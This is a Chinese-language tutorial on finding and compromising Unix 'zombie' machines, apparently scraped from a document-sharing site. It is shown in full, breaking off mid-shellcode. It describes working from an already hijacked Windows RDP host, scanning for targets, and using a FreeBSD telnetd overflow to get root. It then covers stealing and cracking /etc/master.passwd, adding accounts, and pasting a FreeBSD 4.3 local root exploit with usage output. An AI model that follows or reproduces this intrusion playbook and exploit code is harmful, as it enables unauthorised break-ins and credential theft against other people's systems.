如何寻找自己的UNIX肉鸡.docVIP

如何寻找自己的UNIX肉鸡 如何寻找自己的UNIX肉鸡.txt什么叫乐观派？这个。。。。。。就象茶壶一样，屁股被烧得红红的，还有心情吹口哨。生活其实很简单，过了今天就是明天。一生看一个女人是不科学的，容易看出病来。如何寻找自己的UNIX肉鸡 今天的话题是怎么样找unix肉鸡，我想这对于一个有很多windows肉鸡而没有unix肉鸡的人是很有必要。 不罗嗦，直入正题。为什么说是我和x-laser一起找肉鸡呢？因为我们的一切操作全部是在3389肉鸡上进行的。首先我们都上到同一个终端，(前提:终端是对方开的,而不是你自己做的,这样才有终端服务管理器可用)然后用管理工具中的终端管理进行id切换(选择用户进行连接) 这样，两个人就可以互相控制对方了，一举一动都很清楚，这种方法很好，大大提高了效率，也增加了入侵时的乐趣。建议大家推广 ：） 下面我们开始工作。由于是在win上搞unix类，所以我们最好要有在win上用的exploit，以得到第一台unix肉鸡。关于在win上用的exploits可以用cygwin编译（在）有下载。或者直接去大鹰的主页（）或者红客技术联盟（/old.php）下载，注意了，要一起下那个cygwin1.dll的文件，不然搞不成。 现在我们要做的是找出大量unix的肉鸡，然后再去找漏洞，但是怎么找呢？这时候，就请出了我们的languard network scanner，在做了简单的设置让他跑的快点后，我们就开始扫描 我们看到有一台freebsd，这个系统比较好欺负，因为前段时间有个沸沸扬扬的telnetd远程溢出漏洞。当然我们也可以用superscan来快速判断操作系统.我们用superscan扫23端口,因为telnet上去一般都有banner,从而得知操作系统类型. 我们扫到了两台linux,….. ..#..’是linux的判断符. ……..#..’..$则是sunos的判断符,如此等等,大家用用就有经验了. 言归正转,来看我们的freebsd.我们在红盟下好bsd.exe和cygwin1.dll后，就开始溢出了。 由于要发送16M的东西，所以可能会慢点 等到成功后，会出现 command ？ 这是输入 id 可以看到自己已经成为root了。当然，大家还可以把shadow抓下来，bsd下的sh adow文件是/etc/master.passwd，然后john跑个用户名出来（在有john的windows下的版本下载，也是用cygwin编译的），再telnet上去，就得到了普通帐号(因为root帐号一般比较难破)，再进行本地溢出。为什么要这么麻烦呢？因为我们远程得到的shell很多都没有回显，所以不方便添加帐号。一般在bsd下添加帐号是在/usr/sbin下执行./adduser ，然后按着提示做就可以了，bsd系统很稳定，很多大型网站都是用这个建站，比如红盟。本地溢出的代码我在这里贴一下 ?受影响版本： FreeBSD 4.3 4.2 4.1 4.0 早期版本也许受影响 测试程序使用方法： netdemon%gcc -o vvbsd vvbsd.c netdemon%cp /bin/sh /tmp netdemon%./vvbsd vvfreebsd. Written by Georgi Guninski shall jump to bfbffe71 child=61056 login: login: # done # 　　 发现 FreeBSD 4.3 存在一个设计上的漏洞，它允许用户在其它进程中插入 signal handlers。 题出在 rfork(RFPROC|RFSIGSHARE) ，如果子进程 exec() 一个 setuid 程序，然后父进程设置一个 signal handlers，这个 signal handlers 将会在子进程中被复制。发送一个信号给子进程将能导致 signal handlers 被执行。 利用此漏洞，本地攻击者能取得 root 权限。 vvfreebsd.c ???? /* FreeBSD 4.3 local root exploit using shared signals. Written by Georgi Guninski */ #include stdio.h #include signal.h #include unistd.h int vv1; #define MYSIG SIGINT //exec /tm p/sh, shellcode gotten from the internet and modified unsigned char bsdshell[] = \x90\x90\x90\x90\x90\x90\x